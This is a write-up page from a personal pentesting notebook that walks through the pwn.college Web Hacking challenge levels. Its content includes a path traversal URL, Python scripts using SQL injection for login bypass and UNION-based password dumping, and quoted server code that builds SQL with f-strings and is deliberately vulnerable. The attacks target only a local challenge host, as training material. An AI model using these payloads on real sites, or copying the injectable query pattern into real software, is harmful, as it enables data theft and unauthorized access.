Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
    • Mimikatz
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AS-REP roasting
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Kerberosting
        • Kerberos "Double Hop" Problem
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
      • Token Impersonation
      • LNK File Attacks
      • Miscellaneous Misconfigurations
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Post Owning Domain
      • Attacking Active Directory & NTDS.dit 1
      • Golden Ticket Attacks
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • Level 1
  • Level 2
  • Level 3
  • Level 4
  • Level 5
  • Level 6
  1. Boxes/ Machines

PWN COLLGE Web Hacking

Web hacking dojo walkthrough pwn.college

PreviousPWN.COLLEGE Talking WebNextPrivate Challenges

Last updated 9 months ago

Level 1

First run the challenge from /challenge

Now try path traversal with path argument

http://challenge.localhost/?path=../../flag

Level 2

Exploit a command injection vulnerability

Start the challenge

the semicolon at the end ensures that the shell knows the command sequence is complete.

Level 3

Exploit an authentication bypass vulnerability

Level 4

Exploit a structured query language injection vulnerability to login

Doing it with python

form = { "username" : 'flag" --', "password" : "idk", }
response = requests.post("http://challenge.localhost/", data=form)
print(response,"\n",response.text)

Level 5

Exploit a structured query language injection vulnerability to leak data

Code Breakdown

  1. Fetching the Query Parameter:

    pythonCopy codequery = request.args.get("query", "%")

    This line retrieves a query parameter from the URL's query string. If query is not provided, it defaults to %, which is a wildcard in SQL's LIKE clause.

  2. Executing the SQL Query:

    pythonCopy codeusers = db.execute(f'SELECT username FROM users WHERE username LIKE "{query}"').fetchall()

    This line constructs a SQL query using the query parameter. Since it directly inserts the query parameter into the SQL statement, it is vulnerable to SQL injection.

  3. Returning the Results:

    pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)

    This line formats and returns the results of the query, joining all usernames with newline characters.

Exploiting SQL Injection

To exploit the SQL injection vulnerability, you can manipulate the query parameter to include SQL commands that alter the behavior of the query. Here's how you can do it:

  1. Leak All Usernames:

    By using the % wildcard in the LIKE clause, you can match all usernames:

    URL:

    perlCopy codehttp://example.com/path?query=%25

    This constructs the following SQL query:

    sqlCopy codeSELECT username FROM users WHERE username LIKE "%"

    Since % matches any string, this will return all usernames in the users table.

and then we can append Union to dump all passwords

import requests 

params = {"query" : '" UNION SELECT password from USERS --'} 

response = requests.post("http://challenge.localhost/", params=params) 

print(response.text.strip())

Level 6

Exploit a structured query language injection vulnerability with an unknown database structure.

  • Table Creation:

    pythonCopy codetable_name = f"table{hash(flag) & 0xFFFFFFFFFFFFFFFF}"
    db.execute((f"CREATE TABLE IF NOT EXISTS {table_name} AS "
                'SELECT "flag" AS username, ? AS password'),
               (flag,))
    • The code first creates a table with a name based on a hash of the flag. The hash ensures the table name is unique and difficult to guess.

    • The table contains a single row with "flag" as the username and the actual flag value as the password.

  • Query Parameter Handling:

    pythonCopy codequery = request.args.get("query", "%")
    • The query parameter is retrieved from the URL's query string. If query is not provided, it defaults to %, which is a wildcard in SQL's LIKE clause.

  • SQL Query Execution:

    pythonCopy codeusers = db.execute(f'SELECT username FROM {table_name} WHERE username LIKE "{query}"').fetchall()
    • This line constructs and executes a SQL query to select usernames from the dynamically named table where the username matches the query parameter.

  • Returning the Results:

    pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)
    • The code joins all the retrieved usernames with newline characters and returns them as a response.

import requests 

params = {"query": '" UNION SELECT tbl_name from sqlite_master --'} 

response = requests.post("http://challenge.localhost/", params=params) 

t_name = response.text.strip()

params = {"query": f'" UNION SELECT password from {t_name} --' }

response = requests.post("http://challenge.localhost/", params=params) 

print(response.text.strip())